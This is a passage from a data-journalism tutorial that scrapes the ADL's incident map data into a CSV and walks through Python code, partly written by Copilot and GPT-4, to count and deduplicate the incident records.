<span class="w"> </span><span class="nt">"name"</span><span class="p">:</span><span class="w"> </span><span class="s2">"NAME"</span><span class="p">,</span>
<span class="w"> </span><span class="nt">"value"</span><span class="p">:</span><span class="w"> </span><span class="p">[]</span>
<span class="w"> </span><span class="p">},</span>
<span class="w"> </span><span class="nt">"regions_geometry"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="nt">"geometry"</span><span class="p">:</span><span class="w"> </span><span class="s2">"geometry"</span><span class="p">,</span>
<span class="w"> </span><span class="nt">"id"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span>
<span class="w"> </span><span class="s2">"FIPS"</span><span class="p">,</span>
<span class="w"> </span><span class="s2">"STUSPS"</span><span class="p">,</span>
<span class="w"> </span><span class="s2">"NAME"</span>
<span class="w"> </span><span class="p">]</span>
<span class="w"> </span><span class="p">}</span>
<span class="p">}</span>
</pre></div>
<p>And there's the key that describes this data. The metadata array is in this order:</p>
<ul>
<li>Date of Incident</li>
<li>Description</li>
<li>City</li>
<li>State</li>
<li>Incident Type</li>
<li>Israel/Zionism-related</li>
</ul>
<h2 id="converting-the-json-to-a-csv-spreadsheet">Converting the JSON to a CSV spreadsheet</h2><p>I have the raw data that's used to draw points on ADL's map, but it would be considerably easier to read and work with if it were in a spreadsheet format rather than a JSON array of points. So, I wrote a simple Python script to convert this into a CSV spreadsheet.</p>
<p>Chapters 7 and 8 of my book include a basic introduction to Python programming -- intended for total newbies who have never written code before -- in order to do simple data analysis tasks just like this. And Chapter 9 of my book goes into detail on working with spreadsheets in CSV (comma-separated value) format -- making use of the hundreds of CSV files in the BlueLeaks dataset, hacked from police departments in the middle of the 2020 Black Rights Matter uprising.</p>
<p>CSVs are the simplest type of spreadsheet, and like JSON data, CSV data is <em>everywhere</em>.</p>
<p>Here's the first version of the Python script that I wrote, called <code>extract-incidents.py</code>:</p>
<div class="hll"><pre><span></span><span class="kn">import</span> <span class="nn">json</span>
<span class="kn">import</span> <span class="nn">csv</span>
<span class="k">def</span> <span class="nf">main</span><span class="p">():</span>
<span class="c1"># Load html from file</span>
<span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="s2">"map.html"</span><span class="p">)</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span>
<span class="n">html</span> <span class="o">=</span> <span class="n">f</span><span class="o">.</span><span class="n">read</span><span class="p">()</span>
<span class="c1"># Extract data from HTML</span>
<span class="k">for</span> <span class="n">line</span> <span class="ow">in</span> <span class="n">html</span><span class="o">.</span><span class="n">split</span><span class="p">(</span><span class="s2">"</span><span class="se">\n</span><span class="s2">"</span><span class="p">):</span>
<span class="k">if</span> <span class="s2">"_Flourish_data = "</span> <span class="ow">in</span> <span class="n">line</span><span class="p">:</span>
<span class="n">data_json</span> <span class="o">=</span> <span class="n">line</span><span class="o">.</span><span class="n">replace</span><span class="p">(</span><span class="s2">"_Flourish_data = "</span><span class="p">,</span> <span class="s2">""</span><span class="p">)</span>
<span class="n">data_json</span> <span class="o">=</span> <span class="n">data_json</span><span class="o">.</span><span class="n">strip</span><span class="p">()[:</span><span class="o">-</span><span class="mi">1</span><span class="p">]</span> <span class="c1"># strip trailing comma</span>
<span class="n">data</span> <span class="o">=</span> <span class="n">json</span><span class="o">.</span><span class="n">loads</span><span class="p">(</span><span class="n">data_json</span><span class="p">)</span>
<span class="c1"># Save data points as CSV</span>
<span class="n">rows</span> <span class="o">=</span> <span class="p">[]</span>
<span class="n">headers</span> <span class="o">=</span> <span class="p">[</span>
<span class="s2">"Date of Incident"</span><span class="p">,</span>
<span class="s2">"Description"</span><span class="p">,</span>
<span class="s2">"City"</span><span class="p">,</span>
<span class="s2">"State"</span><span class="p">,</span>
<span class="s2">"Incident Type"</span><span class="p">,</span>
<span class="p">]</span>
<span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="s2">"adl-data.csv"</span><span class="p">,</span> <span class="s2">"w"</span><span class="p">)</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span>
<span class="n">writer</span> <span class="o">=</span> <span class="n">csv</span><span class="o">.</span><span class="n">DictWriter</span><span class="p">(</span><span class="n">f</span><span class="p">,</span> <span class="n">fieldnames</span><span class="o">=</span><span class="n">headers</span><span class="p">)</span>
<span class="n">writer</span><span class="o">.</span><span class="n">writeheader</span><span class="p">()</span>
<span class="k">for</span> <span class="n">point</span> <span class="ow">in</span> <span class="n">data</span><span class="p">[</span><span class="s2">"points"</span><span class="p">]:</span>
<span class="n">row</span> <span class="o">=</span> <span class="p">{</span>
<span class="s2">"Date of Incident"</span><span class="p">:</span> <span class="n">point</span><span class="p">[</span><span class="s2">"metadata"</span><span class="p">][</span><span class="mi">0</span><span class="p">],</span>
<span class="s2">"Description"</span><span class="p">:</span> <span class="n">point</span><span class="p">[</span><span class="s2">"metadata"</span><span class="p">][</span><span class="mi">1</span><span class="p">],</span>
<span class="s2">"City"</span><span class="p">:</span> <span class="n">point</span><span class="p">[</span><span class="s2">"metadata"</span><span class="p">][</span><span class="mi">2</span><span class="p">],</span>
<span class="s2">"State"</span><span class="p">:</span> <span class="n">point</span><span class="p">[</span><span class="s2">"metadata"</span><span class="p">][</span><span class="mi">3</span><span class="p">],</span>
<span class="s2">"Incident Type"</span><span class="p">:</span> <span class="n">point</span><span class="p">[</span><span class="s2">"metadata"</span><span class="p">][</span><span class="mi">4</span><span class="p">],</span>
<span class="p">}</span>
<span class="n">rows</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="n">row</span><span class="p">)</span>
<span class="n">writer</span><span class="o">.</span><span class="n">writerow</span><span class="p">(</span><span class="n">row</span><span class="p">)</span>
<span class="nb">print</span><span class="p">(</span><span class="sa">f</span><span class="s2">"Number of rows: </span><span class="si">{</span><span class="nb">len</span><span class="p">(</span><span class="n">rows</span><span class="p">)</span><span class="si">}</span><span class="s2">"</span><span class="p">)</span>
<span class="k">if</span> <span class="vm">__name__</span> <span class="o">==</span> <span class="s2">"__main__"</span><span class="p">:</span>
<span class="n">main</span><span class="p">()</span>
</pre></div>
<p>My script works like this:</p>
<ul>
<li>It opens <code>map.html</code> and loads its contents into a variable called <code>html</code>.</li>
<li>It searches each line in the <code>html</code> variable for the string <code>_Flourish_data =</code>, and if it finds it it does a bit of string slicing to just pull out the JSON string containing of the data, saving it in the variable <code>data_json</code>.</li>
<li>It then loads the raw data into the variable <code>data</code> by setting it equal to <code>json.loads(data_json)</code> -- so now, <code>data</code> is a Python dictionary containing all of the raw data.</li>
<li>It uses <code>csv.DictWriter()</code> to create a new CSV file called <code>adl-data.csv</code> with the column headers set to the same fields in the metadata (except for "Israel/Zionism-related", I decided to leave that one out of my spreadsheet).</li>
<li>It loops through all of the points in the map (<code>data["points"]</code>), and for each point writes a row to the new CSV.</li>
<li>It displays the number of rows in the final CSV that it created.</li>
</ul>
<p>When I just ran it, and I got 1,502 rows:</p>
<pre><code>% python3 extract-incidents.py
Number of rows: 1502
</code></pre>
<p>Now I have a file called <code>adl-data.csv</code>. Here's what it looks like when I open it in Excel:</p>
<p><img src="adl-data-excel.png" alt="Viewing the extracted ADL incident data in Excel"></p>
<p>The first thing that's obvious is that this data is full of duplicates. But I'll deal with that in a minute.</p>
<p>CSV files are the simplest spreadsheet format, and that don't contain any of the advanced features of spreadsheet software like Excel, LibreOffice Calc, or Google Sheets. So this is how I work with the spreadsheet next:</p>
<ul>
<li>I save this file in Excel format (<code>.xlsx</code>).</li>
<li>I click View at the top, and click Freeze Top Row. This freezes the top row because it contains column headers, allowing me to scroll down and still see the headers.</li>
<li>I click Data at the top, and then I click Sort. This allows me to sort the spreadsheet first by one column, then by another, and so on. While doing this reporting, I frequently re-sorted the spreadsheet in order to easily find specific rows. In this case, I'm sorting by Incident Type, then Date of Incident, then State, then City.</li>
</ul>
<p><img src="excel-sorting.png" alt="Sorting a spreadsheet in Excel"></p>
<p>Now that it's sorted by Incident Type, I can that Anti-Israel Rallies is the type at the top.</p>
<p>I immediately see that the "Anti-Israel Rally" rows don't include descriptions -- they just have dates, cities, and incident types. Since the outbreak of the Israel-Gaza war, the anti-war movement has surged and some cities have seen multiple protests and direct actions calling for a ceasefire on the same day, organized by different groups. ADL's data doesn't make it clear which specific event each row is referring to. While I discovered dozens of Jewish-organized peace protests that match the dates and cities in ADL's data, it's impossible to know for sure if those are the specific "Anti-Israel Rallies" that ADL is referring to without asking them. An ADL spokesperson confirmed to me that most (but not all) of a set of 10 specific Jewish-organized protests I sent them were on their map -- some were not though, so ADL was referring to different events.</p>
<h2 id="counting-rows-in-the-spreadsheet">Counting rows in the spreadsheet</h2><p>Here's how I determine how many rows of each type of incident this data contains.</p>
<p>I click on a column in the first "Anti-Israel Rally" row at the top of the spreadsheet, then scroll down until I see the last "Anti-Israel Rally" row, hold Shift, and click on a column in that row. This selects all of the "Anti-Israel Rally" rows. At the bottom of the Window in Excel, I can see that I have selected 471 rows.</p>
<p><img src="excel-counting.png" alt="Counting "Anti-Israel Rallies" in Excel"></p>
<p>Repeating these steps with the other incident types, I found that this data includes the following number of rows for each incident type:</p>
<ul>
<li>Anti-Israel Rally: 471</li>
<li>Anti-Israel Rally w. Support for Terror: 171</li>
<li>Assault: 41</li>
<li>Harassment: 576</li>
<li>Vandalism: 243</li>
</ul>
<p>However, this data isn't quite accurate yet because I haven't taken account of the obvious duplicates.</p>
<h2 id="looking-into-the-duplicates">Looking into the duplicates</h2><p>Looking back at the Assault, Harassment, and Vandalism data, it's clear that there are duplicates. For example, there are two rows that have these exact same values:</p>
<ul>
<li>Date of Incident: 10/12/23</li>
<li>Description:<blockquote><p>A student posted a photo of another student performing a Nazi salute with the caption "These Jewish kids better watch themselves on Halloween" on a Snapchat story, which was visible to Jewish classmates.</p>
</blockquote>
</li>
<li>City: Everett</li>
<li>State: Washington</li>
<li>Incident Type: Harassment</li>
</ul>
<p>Since these two rows are exactly the same, they are obviously duplicates. However, there are rows where the descriptions don't match exactly, but are so similar that they appear to be duplicates anyway -- it looks like maybe the description was updated to fix a typo, and the old data point remained after the fix. For example, there are two rows that both document Harassment that occurred October 10 in Asheville, NC, but one row has this description:</p>
<blockquote><p>A rabbi received harassing antisemitic emails that <strong>defended</strong> the Holocaust and Hamas's attack on Israel.</p>
</blockquote>
<p>And another has this description:</p>
<blockquote><p>A rabbi received harassing antisemitic emails that <strong>justified</strong> the Holocaust and Hamas's attack on Israel.</p>
</blockquote>
<p>Even though one says "defended" and the other says "justified", I think that these rows are duplicates of the same incident, and when someone at ADL updated the description it kept the original row in the dataset.</p>
<p>Note that <em>I don't think this means ADL is miscounting the antisemitic incident data that it's reporting</em>. Everything I've seen shows that ADL does not appear to be counting duplicates in its statistics, they just happen to appear on the map for some reason.</p>
<p>If you load ADL's Stand With Israel map, zoom in on Asheville, NC, and toggle off all of the categories except Harassment, you'll see a blue dot over Asheville. When you mouse-over it, it shows this incident, with the word "justified" instead of "defended".</p>
<p><img src="asheville-harassment1.png" alt="Viewing an antisemitic incident point in Asheville, NC"></p>
<p>I then opened <code>map.html</code> in VS Code and searched for this incident in the HTML. I found that the enormous <code>_Flourish_data</code> line includes this piece of data (which I've formatted using VS Code, so that you can actually read it):</p>
<div class="hll"><pre><span></span><span class="p">{</span>
<span class="w"> </span><span class="nt">"color"</span><span class="p">:</span><span class="w"> </span><span class="s2">"Harassment"</span><span class="p">,</span>
<span class="w"> </span><span class="nt">"lat"</span><span class="p">:</span><span class="w"> </span><span class="mf">35.60271</span><span class="p">,</span>
<span class="w"> </span><span class="nt">"lon"</span><span class="p">:</span><span class="w"> </span><span class="mf">-82.5673</span><span class="p">,</span>
<span class="w"> </span><span class="nt">"metadata"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span>
<span class="w"> </span><span class="s2">"10/10/2023"</span><span class="p">,</span>
<span class="w"> </span><span class="s2">"A rabbi received harassing antisemitic emails that justified the Holocaust and Hamas's attack on Israel."</span><span class="p">,</span>
<span class="w"> </span><span class="s2">"Asheville"</span><span class="p">,</span>
<span class="w"> </span><span class="s2">"North Carolina"</span><span class="p">,</span>
<span class="w"> </span><span class="s2">"Harassment"</span><span class="p">,</span>
<span class="w"> </span><span class="s2">"No"</span>
<span class="w"> </span><span class="p">],</span>
<span class="w"> </span><span class="nt">"name"</span><span class="p">:</span><span class="w"> </span><span class="s2">"10/10/2023"</span><span class="p">,</span>
<span class="w"> </span><span class="nt">"value"</span><span class="p">:</span><span class="w"> </span><span class="p">[]</span>
<span class="p">},</span>
</pre></div>
<p>I deleted that from <code>_Flourish_data</code>, saved <code>map.html</code>, and then opened <code>map.html</code> in my browser so I could view the modified version of this HTML file locally. Again, I zoomed into Asheville and toggled off all the categories except Harassment. This time, the circle at Asheville is a slightly lighter shade of blue, and when I mouse-over it, it shows the other duplicate incident, with the word "defended" instead of "justified":</p>
<p><img src="asheville-harassment2.png" alt="Viewing the duplicate antisemitic incident point in Asheville, NC"></p>
<p>By deleting bits of data from <code>map.html</code> and then refreshing the page to view the map, I discovered a few things:</p>
<ul>
<li>All of the points in this data are in fact getting mapped, even the duplicates.</li>
<li>The darker the circle on the map, the more points are drawn over each other -- this may be because of duplicates, or because of multiple incidents (perhaps on different dates) in the same city.</li>
<li>If multiple points are drawn in same city, ADL's interface only allows you to look at the <em>top-most point that was drawn</em> -- the other incidents are technically drawn on the map, but you can't mouse-over them because the top point is in the way. You can't see them, but they're there.</li>
</ul>
<p>Now that I have an understanding of how the duplicates in this dataset work, I need to de-dupe it.</p>
<h2 id="de-duplicating-the-data">De-duplicating the data</h2><p>To de-dupe the data, I wrote some more Python code, this time with the help of AI -- specifically, <a href="https://github.com/features/copilot">GitHub Copilot</a> (code-writing AI that you can integrate into VS Code) and ChatGPT. I could have done it without AI, but doing it with AI saved a lot of time.</p>
<p>My Python script so far loads <code>map.html</code>, extracts the data, and saves it as <code>adl-data.csv</code>. Every row of data in the spreadsheet is saved in a variable called <code>rows</code>. To de-dupe the data, I want to remove all of the duplicates from the <code>rows</code> list and then save that into a new, de-duped version of the CSV.</p>
<p>I decided to start with the easy ones and de-duplicate exact matches. Since I have GitHub Copilot set up and logged into my VS Code, I just wrote a comment saying something like:</p>
<div class="hll"><pre><span></span><span class="c1"># This function takes in a list of dictionaries, and returns a de-duplicated list,</span>
<span class="c1"># where a duplicate is an item where all of the keys in its dictionary are exactly</span>
<span class="c1"># the same as another item.</span>
</pre></div>
<p>And, lo and behold, GitHub Copilot auto-suggested the following function for me:</p>
<div class="hll"><pre><span></span><span class="k">def</span> <span class="nf">dedupe_exact_matches</span><span class="p">(</span><span class="n">items</span><span class="p">,</span> <span class="n">key</span><span class="p">):</span>
<span class="n">seen</span> <span class="o">=</span> <span class="nb">set</span><span class="p">()</span>
<span class="n">result</span> <span class="o">=</span> <span class="p">[]</span>
<span class="k">for</span> <span class="n">item</span> <span class="ow">in</span> <span class="n">items</span><span class="p">:</span>
<span class="n">val</span> <span class="o">=</span> <span class="nb">tuple</span><span class="p">(</span><span class="n">item</span><span class="p">[</span><span class="n">k</span><span class="p">]</span> <span class="k">for</span> <span class="n">k</span> <span class="ow">in</span> <span class="n">key</span><span class="p">)</span>
<span class="k">if</span> <span class="n">val</span> <span class="ow">not</span> <span class="ow">in</span> <span class="n">seen</span><span class="p">:</span>
<span class="n">seen</span><span class="o">.</span><span class="n">add</span><span class="p">(</span><span class="n">val</span><span class="p">)</span>
<span class="n">result</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="n">item</span><span class="p">)</span>
<span class="k">return</span> <span class="n">result</span>
</pre></div>
<p>I added this function to my script, and then after saving <code>adl-data.csv</code>, I added the following code:</p>
<div class="hll"><pre><span></span><span class="c1"># Dedupe</span>
<span class="n">rows</span> <span class="o">=</span> <span class="n">dedupe_exact_matches</span><span class="p">(</span><span class="n">rows</span><span class="p">,</span> <span class="n">headers</span><span class="p">)</span>
<span class="nb">print</span><span class="p">(</span><span class="sa">f</span><span class="s2">"Number of rows after de-duping exact matches: </span><span class="si">{</span><span class="nb">len</span><span class="p">(</span><span class="n">rows</span><span class="p">)</span><span class="si">}</span><span class="s2">"</span><span class="p">)</span>
<span class="c1"># Save the de-duped CSV</span>
<span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="s2">"adl-data-deduped.csv"</span><span class="p">,</span> <span class="s2">"w"</span><span class="p">)</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span>
<span class="n">writer</span> <span class="o">=</span> <span class="n">csv</span><span class="o">.</span><span class="n">DictWriter</span><span class="p">(</span><span class="n">f</span><span class="p">,</span> <span class="n">fieldnames</span><span class="o">=</span><span class="n">headers</span><span class="p">)</span>
<span class="n">writer</span><span class="o">.</span><span class="n">writeheader</span><span class="p">()</span>
<span class="k">for</span> <span class="n">row</span> <span class="ow">in</span> <span class="n">rows</span><span class="p">:</span>
<span class="n">writer</span><span class="o">.</span><span class="n">writerow</span><span class="p">(</span><span class="n">row</span><span class="p">)</span>
</pre></div>
<p>When I run my script, here's the output:</p>
<pre><code>% python3 extract-incidents.py
Number of rows: 1502
Number of rows after de-duping exact matches: 1263
</code></pre>
<p>I can see that 239 rows, all exact duplicates, were deleted. The script saves the file <code>adl-data-deduped.csv</code>. When I open it, I can see that many of the duplicates are gone, however there are still duplicates that aren't exact matches.</p>
<p>For example, after opening <code>adl-data-deduped.csv</code> in Excel, I can see that there are duplicate rows from an incident in Clifton, New Jersey on October 7. One of them has the description:</p>
<blockquote><p>An individual shouted ?Long live Hamas? at a synagogue during Simchat Torah celebrations.</p>
</blockquote>
<p>The other has the description:</p>
<blockquote><p>An individual shouted "Long live Hamas" at a synagogue during Simchat Torah celebrations.</p>
</blockquote>
<p>The first one used question marks instead of quotes, while the second one used quotes -- this looks like another example of someone correcting a typo in the description of an incident, but instead just adding a second incident.</p>
<p>At this point, I could have chosen to manually de-dupe the rest of the spreadsheet and leave at that. And, at first, this is exactly what I did: In Excel, I sorted the spreadsheet so that potential duplicates would be next to each other, and then looked through each of the 1,263 rows trying to find duplicates, and deleting one of them when I found them.</p>
<p>But since this reporting took me a little over a week, and since ADL was constantly updating their map, and every day activists took to the streets in dozens of new Palestinian solidarity protests (or "anti-Israel rallies," in ADL's language), I realized that I'd want to reload the map and get later versions of the dataset, and I didn't want to have manually de-dupe the spreadsheet again each time I did this.</p>
<p>I figured it must be possible to measure a numeric "distance" between two descriptions. If the distance was small enough (if the descriptions were almost the same), then I could consider them duplicates. If the distance was large (if they're two totally different sentences), I could conclude that they're not duplicates. I wasn't sure the simple way to do this in Python though, so I asked ChatGPT. I have a ChatGPT Plus account, giving me account to GPT-4, which is considerably better at this sort of thing than the free GPT-3.5.</p>
<p>I asked GPT-4 the following query, using real examples of duplicates as well as non-duplicates from the ADL dataset:</p>
<blockquote><p>Write a Python function for me called <code>is_duplicate()</code>. This function should take two dictionaries, like <code>row1</code> and <code>row2</code>, and determine if they are duplicate rows. It should return True if they're likely duplicates and False if they're not.</p>
<p>First, it should compare all of the fields in the two rows, and if any of them other than <code>Description</code> are different, it should return False, as these are not duplicates.</p>
<p>Then, it should measure the "distance" between the descriptions of these two rows (<code>row1["Description"] and row2["Description"]</code>). If the descriptions are very similar, it should consider them duplicates. If the descriptions are not similar, it should consider them not duplicates.</p>
<p>Here are descriptions that are similar enough to be duplicates:</p>
<ul>
<li>An individual shouted "Long live Hamas" at a synagogue during Simchat Torah celebrations.</li>
<li>An individual shouted ?Long live Hamas? at a synagogue during Simchat Torah celebrations.</li>
</ul>
<p>Here's another example of duplicates:</p>
<ul>
<li>After noticing two visibly Jewish people speaking Hebrew, an individual followed the victims and screamed "Allahu Akbar."</li>
<li>After noticing two visibly Jewish people speaking Hebrew, an individual followed the victims and screamed "Allahu Akbar" at them.</li>
</ul>
<p>And here's another example of duplicates:</p>
<ul>
<li>During an anti-Israel rally, protestors made anti-Zionist comments such as "Zionism has got to go," praised violence against Israeli civilians and displayed antisemitic symbols including a swastika and the flag of Hamas.</li>
<li>During an anti-Israel rally, protestors made anti-Zionist comments such as "Zionism has got to go," praised violence against Israeli civilians and displayed antisemitic symbols, including a swastika.</li>
</ul>
<p>Here's an example of descriptions that are NOT duplicates:</p>
<ul>
<li>Swastika graffiti was left on the garage door of a home.</li>
<li>Swastikas were spray-painted on a playground.</li>
</ul>
<p>Here's another example of descriptions that are NOT duplicates:</p>
<ul>
<li>An individual wearing a Nazi uniform entered a restaurant.</li>
<li>Extremist individuals distributed antisemitic propaganda the Fort Worth Botanic Garden.</li>
</ul>
</blockquote>
<p>Here's the code that GPT-4 gave me:</p>
<div class="hll"><pre><span></span><span class="kn">import</span> <span class="nn">difflib</span>
<span class="k">def</span> <span class="nf">is_duplicate</span><span class="p">(</span><span class="n">row1</span><span class="p">,</span> <span class="n">row2</span><span class="p">):</span>
<span class="c1"># Check if any field other than 'Description' is different</span>
<span class="k">for</span> <span class="n">key</span> <span class="ow">in</span> <span class="n">row1</span><span class="p">:</span>
<span class="k">if</span> <span class="n">key</span> <span class="o">!=</span> <span class="s1">'Description'</span> <span class="ow">and</span> <span class="n">row1</span><span class="p">[</span><span class="n">key</span><span class="p">]</span> <span class="o">!=</span> <span class="n">row2</span><span class="p">[</span><span class="n">key</span><span class="p">]:</span>
<span class="k">return</span> <span class="kc">False</span>
<span class="c1"># Compare descriptions using a simple similarity measure</span>
<span class="n">similarity</span> <span class="o">=</span> <span class="n">difflib</span><span class="o">.</span><span class="n">SequenceMatcher</span><span class="p">(</span><span class="kc">None</span><span class="p">,</span> <span class="n">row1</span><span class="p">[</span><span class="s1">'Description'</span><span class="p">],</span> <span class="n">row2</span><span class="p">[</span><span class="s1">'Description'</span><span class="p">])</span><span class="o">.</span><span class="n">ratio</span><span class="p">()</span>
<span class="c1"># Define a threshold for similarity (e.g., 0.8)</span>
<span class="n">threshold</span> <span class="o">=</span> <span class="mf">0.8</span>
<span class="k">return</span> <span class="n">similarity</span> <span class="o">>=</span> <span class="n">threshold</span>
<span class="c1"># Example usage</span>
<span class="n">row1</span> <span class="o">=</span> <span class="p">{</span><span class="s1">'Field1'</span><span class="p">:</span> <span class="s1">'Value1'</span><span class="p">,</span> <span class="s1">'Field2'</span><span class="p">:</span> <span class="s1">'Value2'</span><span class="p">,</span> <span class="s1">'Description'</span><span class="p">:</span> <span class="s1">'An individual shouted "Long live Hamas" at a synagogue during Simchat Torah celebrations.'</span><span class="p">}</span>
<span class="n">row2</span> <span class="o">=</span> <span class="p">{</span><span class="s1">'Field1'</span><span class="p">:</span> <span class="s1">'Value1'</span><span class="p">,</span> <span class="s1">'Field2'</span><span class="p">:</span> <span class="s1">'Value2'</span><span class="p">,</span> <span class="s1">'Description'</span><span class="p">:</span> <span class="s1">'An individual shouted ?Long live Hamas? at a synagogue during Simchat Torah celebrations.'</span><span class="p">}</span>
<span class="nb">print</span><span class="p">(</span><span class="n">is_duplicate</span><span class="p">(</span><span class="n">row1</span><span class="p">,</span> <span class="n">row2</span><span class="p">))</span> <span class="c1"># Should return True for similar descriptions</span>
</pre></div>
<p>I then created a new script to test GPT-4's code and make sure that it works, by passing in these same examples of real duplicates and real not-duplicates to see if it actually works as intended.</p>
<p>All of the following data, by the way, are actual antisemitic incidents tracked by ADL (note the stark difference between these and peace rallies organized by Jews demanding a ceasefire in Gaza).</p>
<p>Here's my test script:</p>
<div class="hll"><pre><span></span><span class="kn">import</span> <span class="nn">difflib</span>
<span class="k">def</span> <span class="nf">is_duplicate</span><span class="p">(</span><span class="n">row1</span><span class="p">,</span> <span class="n">row2</span><span class="p">):</span>
<span class="c1"># Check if any field other than 'Description' is different</span>
<span class="k">for</span> <span class="n">key</span> <span class="ow">in</span> <span class="n">row1</span><span class="p">:</span>
<span class="k">if</span> <span class="n">key</span> <span class="o">!=</span> <span class="s2">"Description"</span> <span class="ow">and</span> <span class="n">row1</span><span class="p">[</span><span class="n">key</span><span class="p">]</span> <span class="o">!=</span> <span class="n">row2</span><span class="p">[</span><span class="n">key</span><span class="p">]:</span>
<span class="k">return</span> <span class="kc">False</span>
<span class="c1"># Compare descriptions using a simple similarity measure</span>
<span class="n">similarity</span> <span class="o">=</span> <span class="n">difflib</span><span class="o">.</span><span class="n">SequenceMatcher</span><span class="p">(</span>
<span class="kc">None</span><span class="p">,</span> <span class="n">row1</span><span class="p">[</span><span class="s2">"Description"</span><span class="p">],</span> <span class="n">row2</span><span class="p">[</span><span class="s2">"Description"</span><span class="p">]</span>
<span class="p">)</span><span class="o">.</span><span class="n">ratio</span><span class="p">()</span>
<span class="c1"># Define a threshold for similarity (e.g., 0.8)</span>
<span class="n">threshold</span> <span class="o">=</span> <span class="mf">0.8</span>
<span class="k">return</span> <span class="n">similarity</span> <span class="o">>=</span> <span class="n">threshold</span>
<span class="nb">print</span><span class="p">(</span><span class="s2">"The follow are real duplicates and should return True:"</span><span class="p">)</span>
<span class="nb">print</span><span class="p">(</span><span class="n">is_duplicate</span><span class="p">(</span>
<span class="p">{</span>
<span class="s2">"Date of Incident"</span><span class="p">:</span> <span class="s2">"10/7/23"</span><span class="p">,</span>
<span class="s2">"Description"</span><span class="p">:</span> <span class="s1">'An individual shouted "Long live Hamas" at a synagogue during Simchat Torah celebrations.'</span><span class="p">,</span>
<span class="s2">"City"</span><span class="p">:</span> <span class="s2">"Clifton"</span><span class="p">,</span>
<span class="s2">"State"</span><span class="p">:</span> <span class="s2">"New Jersey"</span><span class="p">,</span>
<span class="s2">"Incident Type"</span><span class="p">:</span> <span class="s2">"Harassment"</span><span class="p">,</span>
<span class="p">},</span>
<span class="p">{</span>
<span class="s2">"Date of Incident"</span><span class="p">:</span> <span class="s2">"10/7/23"</span><span class="p">,</span>
<span class="s2">"Description"</span><span class="p">:</span> <span class="s2">"An individual shouted ?Long live Hamas? at a synagogue during Simchat Torah celebrations."</span><span class="p">,</span>
<span class="s2">"City"</span><span class="p">:</span> <span class="s2">"Clifton"</span><span class="p">,</span>
<span class="s2">"State"</span><span class="p">:</span> <span class="s2">"New Jersey"</span><span class="p">,</span>
<span class="s2">"Incident Type"</span><span class="p">:</span> <span class="s2">"Harassment"</span><span class="p">,</span>
<span class="p">},</span>
<span class="p">))</span>
<span class="nb">print</span><span class="p">(</span><span class="n">is_duplicate</span><span class="p">(</span>
<span class="p">{</span>
<span class="s2">"Date of Incident"</span><span class="p">:</span> <span class="s2">"10/7/23"</span><span class="p">,</span>
<span class="s2">"Description"</span><span class="p">:</span> <span class="s1">'After noticing two visibly Jewish people speaking Hebrew, an individual followed the victims and screamed "Allahu Akbar."'</span><span class="p">,</span>
<span class="s2">"City"</span><span class="p">:</span> <span class="s2">"Brooklyn"</span><span class="p">,</span>
<span class="s2">"State"</span><span class="p">:</span> <span class="s2">"New York"</span><span class="p">,</span>
<span class="s2">"Incident Type"</span><span class="p">:</span> <span class="s2">"Harassment"</span><span class="p">,</span>
<span class="p">},</span>
<span class="p">{</span>
<span class="s2">"Date of Incident"</span><span class="p">:</span> <span class="s2">"10/7/23"</span><span class="p">,</span>
<span class="s2">"Description"</span><span class="p">:</span> <span class="s1">'After noticing two visibly Jewish people speaking Hebrew, an individual followed the victims and screamed "Allahu Akbar" at them.'</span><span class="p">,</span>
<span class="s2">"City"</span><span class="p">:</span> <span class="s2">"Brooklyn"</span><span class="p">,</span>
<span class="s2">"State"</span><span class="p">:</span> <span class="s2">"New York"</span><span class="p">,</span>
<span class="s2">"Incident Type"</span><span class="p">:</span> <span class="s2">"Harassment"</span><span class="p">,</span>
<span class="p">},</span>
<span class="p">))</span>
<span class="nb">print</span><span class="p">(</span><span class="n">is_duplicate</span><span class="p">(</span>
<span class="p">{</span>
<span class="s2">"Date of Incident"</span><span class="p">:</span> <span class="s2">"10/8/23"</span><span class="p">,</span>
<span class="s2">"Description"</span><span class="p">:</span> <span class="s1">'During an anti-Israel rally, protestors made anti-Zionist comments such as "Zionism has got to go," praised violence against Israeli civilians and displayed antisemitic symbols including a swastika and the flag of Hamas.'</span><span class="p">,</span>
<span class="s2">"City"</span><span class="p">:</span> <span class="s2">"Manhattan"</span><span class="p">,</span>
<span class="s2">"State"</span><span class="p">:</span> <span class="s2">"New York"</span><span class="p">,</span>
<span class="s2">"Incident Type"</span><span class="p">:</span> <span class="s2">"Harassment"</span><span class="p">,</span>
<span class="p">},</span>
<span class="p">{</span>
<span class="s2">"Date of Incident"</span><span class="p">:</span> <span class="s2">"10/8/23"</span><span class="p">,</span>
<span class="s2">"Description"</span><span class="p">:</span> <span class="s1">'During an anti-Israel rally, protestors made anti-Zionist comments such as "Zionism has got to go," praised violence against Israeli civilians and displayed antisemitic symbols, including a swastika.'</span><span class="p">,</span>
<span class="s2">"City"</span><span class="p">:</span> <span class="s2">"Manhattan"</span><span class="p">,</span>
<span class="s2">"State"</span><span class="p">:</span> <span class="s2">"New York"</span><span class="p">,</span>
<span class="s2">"Incident Type"</span><span class="p">:</span> <span class="s2">"Harassment"</span><span class="p">,</span>
<span class="p">},</span>
<span class="p">))</span>
<span class="nb">print</span><span class="p">(</span><span class="s2">"The follow are not duplicates and should return False:"</span><span class="p">)</span>
<span class="nb">print</span><span class="p">(</span><span class="n">is_duplicate</span><span class="p">(</span>
<span class="p">{</span>
<span class="s2">"Date of Incident"</span><span class="p">:</span> <span class="s2">"10/8/23"</span><span class="p">,</span>
<span class="s2">"Description"</span><span class="p">:</span> <span class="s2">"Swastika graffiti was left on the garage door of a home."</span><span class="p">,</span>
<span class="s2">"City"</span><span class="p">:</span> <span class="s2">"St. Louis"</span><span class="p">,</span>
<span class="s2">"State"</span><span class="p">:</span> <span class="s2">"Missouri"</span><span class="p">,</span>
<span class="s2">"Incident Type"</span><span class="p">:</span> <span class="s2">"Vandalism"</span><span class="p">,</span>
<span class="p">},</span>
